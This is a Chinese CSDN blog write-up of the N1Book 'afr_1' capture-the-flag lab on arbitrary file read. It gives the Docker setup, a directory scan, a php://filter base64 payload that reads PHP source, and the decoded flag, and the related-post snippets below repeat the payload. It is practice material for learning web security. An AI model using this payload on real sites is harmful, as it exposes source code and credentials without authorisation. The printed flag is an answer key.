【文件读取/包含】任意文件读取漏洞 afr_1

wj33333

已于 2023-11-15 22:31:45 修改

阅读量353

点赞数

分类专栏：文件包含漏洞库文件读取文章标签：安全网络 web安全

于 2023-11-15 20:18:48 首次发布

本文链接：https://blog.csdn.net/wj33333/article/details/134427461

版权

漏洞库同时被 3 个专栏收录

23 篇文章 0 订阅

订阅专栏

文件读取

16 篇文章 0 订阅

订阅专栏

文件包含

8 篇文章 0 订阅

订阅专栏

1.1漏洞描述

漏洞名称	任意文件读取漏洞 afr_1
漏洞类型	文件读取
漏洞等级	⭐
漏洞环境	docker
攻击方式

1.2漏洞等级

高危

1.3影响版本

暂无

1.4漏洞复现

1.4.1.基础环境

靶场	docker
工具	BurpSuite

1.4.2.靶场搭建

1.创建docker-compose.yml文件

version: '3.2'

services:
web:
image: registry.cn-hangzhou.aliyuncs.com/n1book/web-file-read-1:latest
ports:
- 80:80

2.将该代码写入文件

启动方式

docker-compose up -d

flag

n1book{afr_1_solved}

关闭

sudo docker-compose down

3.访问kali 80端口

搭建成功

1.5深度利用

1.5.1漏洞点

dirsearch --url http://10.9.47.79

2.查看 /flag.php

3.查看/index.php

发现跳转到 ?p=hello

所以可能是/index.html包含了?p=hello

文件包含

4.使用php://fileter 读取（读取php源码）

?filepath=php://filter/read=convert.base64-encode/resource=[目标文件]

它读取到的结果是base64加密的

PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9

5.进行base64解码

6.成功拿到flag

n1book{afr_1_solved}

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

升级

打补丁

上设备

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

wj33333

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

AFR批量文件查找替换.zip

04-13

AFR通常会提供过滤选项，让用户可以选择特定类型的文件（如只处理文本文件）或者排除某些不包含目标文本的文件。此外，它可能还支持正则表达式，这将使查找和替换功能更为强大，能够处理更复杂的匹配模式。在执行...

N1Book-第一章Web入门-任意文件读取漏洞-afr_1

抒情诗

05-08

374

这个是传统的任意文件读取漏洞，可以利用php的本地文件包含（Local File Include）实现，使用php的伪协议进行文件读取；或者利用php文件读取函数。本题为Nu1L团队编著的《从0到1：CTFer成长之路》配套题目。来源网站：https://book.nu1l.com/这里可能没有include文件包含，而是使用。没源码不好分析，这里应该逻辑也不大难。造成的文件读取漏洞。

参与评论您还未登录，请先登录后发表或查看评论

【第一章 web入门]afr_1 1】任意文件读取

最新发布

carrot11223的博客

01-25

866

任意文件读取/下载漏洞（Arbitrary File Read/Download Vulnerability），是指攻击者可以通过某些漏洞，绕过应用程序的限制，直接读取或下载应用程序之外的文件。这种漏洞通常是由于应用程序没有对用户输入进行充分的验证和过滤而导致的。攻击者可以通过构造恶意的请求来利用该漏洞，从而读取或下载他们本来无权访问的文件，如密码、私钥、证书等，会提供攻击者更多可用信息，提高被入侵的风险。

BUU-N1BOOK-Web

楼阁de猫的博客

12-11

1195

web入门[第一章 web入门]常见的信息搜集[第一章 web入门]粗心的小李 [第一章 web入门]常见的信息搜集考查知识点： 1.常规文件：robots.txt 2.gedit备份文件 3.vim备份文件首先看robots.txt：访问一下这个文件得到flag1 再看一下原始文件ihdex.php，发现什么都没有，之前用dirsearch扫了很多东西出来，试了/.git发现也不对，这里就看到书上讲到了gedit备份文件，它是以 ~ 为后缀的，试试index.php~，有东西了，拿到flag

File Read| file-read| 任意文件读取

薛定谔嘚喵博客

05-05

893

任意文件读取的危害往往大于目录遍历漏洞，任意文件读取不仅会泄露网站的结构目录，一些敏感文件还会被通过构造特殊的字符结构下载下来，比如说…任意文件读取是属于文件操作漏洞的一种，通过提交专门设计的输入，攻击者就可以在被访问的文件系统中读取或写入任意内容，往往能够使攻击者从服务器上获取敏感文件，正常读取的文件没有经过校验或者校验不严格，用户可以控制这个变量或者变量读取任意文件。7、读取web应用日志文件，中间件的日志文件，其他程序的日志，系统日志等（可以网站后台地址、api接口、备份、等等敏感信息）

【合天网安】DoraBox之文件包含及任意文件读取漏洞

hehigoxqc606的博客

09-01

700

【合天网安实验室】DoraBox之文件包含及任意文件读取漏洞目的：过DoraBox靶场系列练习，学习任意文件包含、目录限制文件包含及任意文件读取漏洞的利用过程。实验过程： 1.确保Apache、MySQL服务正常开启 2、查看.txt文本内容 3.使用include直接包含，可以直接进行任意文件读取 4.在file输入.txt文档路径，点击【submit】，显示以下内容成功包含并执行了.txt的PHP代码 5、目录限制文...

AFR.zip_RP Java_afr 48a_cad java_java cad_them

09-19

A system that takes CAD drawings as input and apply automatic feature recognition methods on them to identify different features present in them. The feature will then populate in a tree in the system...

HA_AFR20_gnatix

03-04

快速查找工具HA_AFR20_gnatix

AFR1:改写AFR

03-19

在提供的文件名称"AFR1-develop"中，“develop”可能意味着这是一个开发版本，可能包含了代码的早期版本、注释、设计文档或其他开发过程中的资源。为了了解AFR改写的具体实现，我们需要查看这些文件内容，包括VBA...

C#人脸识别+虹软AFR_FSDK_Demo_仅供项目实战学习

07-10

使用到的虹软的SDK包中，...AFR_FSDK_FaceInput public struct AFR_FSDK_FaceInput { public MRECT rcFace; public int lOrient; } 这个结构体是FD识别的输出结构体，我们在上一章节标记人脸时使用了此结构体。

任意文件读取和上传

weixin_43876438的博客

10-22

846

文章目录任意文件读取和上传任意文件读取危害存在位置防御手段例1例2任意文件上传危害防御手段绕过姿势前端JS校验代码校验例子任意文件读取和上传任意文件读取任意文件读取，也可以称为任意文件下载或文件包含（File Inclusion），指的是代码中没有对参数进行严格限制，导致攻击者可以通过目录穿越或修改读取的文件名从而达到读取任意文件的目的危害配置文件泄露：攻击者通过任意文件读取漏洞查看配置文件，从而获取数据库连接等相关的敏感信息；也可以读取业务代码，造成源码泄露执行shell命令：攻击者首先

[第一章 web入门]afr_1

qq_43618536的博客

07-24

869

[第一章 web入门]afr_1

《从0到1：CTFer成长之路》--afr_1 BUUCTF

wuyaowangchuan的博客

11-17

4039

任意文件读取漏洞发现了?p=hello，然后页面回显了hello world 因为提示了是文件读取漏洞没有回显因为刚刚也是?p=hello没有后缀，猜测后台有自己加后缀 php的filter读取一下 ?p=php://filter/read=convert.base64-encode/resource=flag PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9 base64解码 n1book{afr_1_solv.

NU1LCTFer的成长之路-web入门-任意文件读取漏洞-afr_1-wp

居上

06-29

350

afr_1 payload http://192.168.60.134/?p=php://filter/convert.base64-encode/resource=flag 这句话的意思是我们用base64编码的方式来读文件index.php；这时页面会显示出源文件index.php经过base64编码后的内容，然后经过base64解码就可以看到flag； BP base64解码得到flag ...

N1Book-第一章Web入门-任意文件读取漏洞-afr_3

weixin_40872714的博客

04-03

1273

N1Book-第一章Web入门-任意文件读取漏洞-afr_3 参考文章： https://blog.csdn.net/AAAAAAAAAAAA66/article/details/121490787 http://elssm.top/2021/11/29/SSTI%E6%A8%A1%E7%89%88%E6%B3%A8%E5%85%A5/ https://www.freebuf.com/articles/web/264088.html

从0到1CTFer成长之路-第一章-任意文件读取漏洞

黑白的博客

03-01

1436

任意文件读取漏洞声明好好向大佬们学习！！！攻击 afr_1 kali执行 vim docker-compose.yml 内容如下 version: '3.2' services: web: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-information-backk:latest ports: - 80:80 开启docker docker-compose up -d 访问80 http://192.

《从0到1：CTFer成长之路》书籍配套题目-[第一章 web入门]任意文件读取漏洞

weixin_46703850的博客

02-23

1528

《从0到1：CTFer成长之路》书籍配套题目，来源网站：[《从0到1：CTFer成长之路》](https://book.nu1l.com/)

N1BOOK第四关摸鱼：[第一章 web入门]afr_1

weixin_45571987的博客

12-02

2700

BUUCTF：[第一章 web入门]afr_1寻找考点构造解题payload解码base64编码得到flag关于php伪协议寻找考点由题目我们可以得知本题考点是php伪协议（其实知道是文件读取漏洞也不知道会用到php://filter的伪协议来读取源码的文件构造解题payload php://filter 读取源代码并进行base64编码输出，不然会直接当做php代码执行就看不到源代码内容了。下面我们构造url，下面是通用格式http://127.0.0.1/cmd.php?file=ph

任意文件读取漏洞小记

weixin_37104668的博客

09-12

1089

漏洞介绍很多网站由于业务需求，往往需要提供文件(附件)下载的功能块，但是如果对下载的文件没有做限制，直接通过绝对路径对其文件进行下载，那么，恶意用户就可以利用这种方式下载服务器的敏感文件，对服务器进行进一步的威胁和攻击。漏洞存在的地方系统中存在文件(附件/文档/图片等等资源)下载的地方。任意文件读取常见参数名： &RealPath= &FilePath= &file= &filename= &Path= &path= &inputFile= &

AFR_FSDK_FACEMODEL

11-10

该结构体包含两个成员变量：pbFeatur和FeaturSiz。其中，pbFeatur是一个指向人脸特征数据的指针，FeaturSiz是人脸特征数据的长度。通过将人脸图像输入到虹软人脸识别SDK中，可以得到一个AFR_FSDK_FACEMODEL结构体，...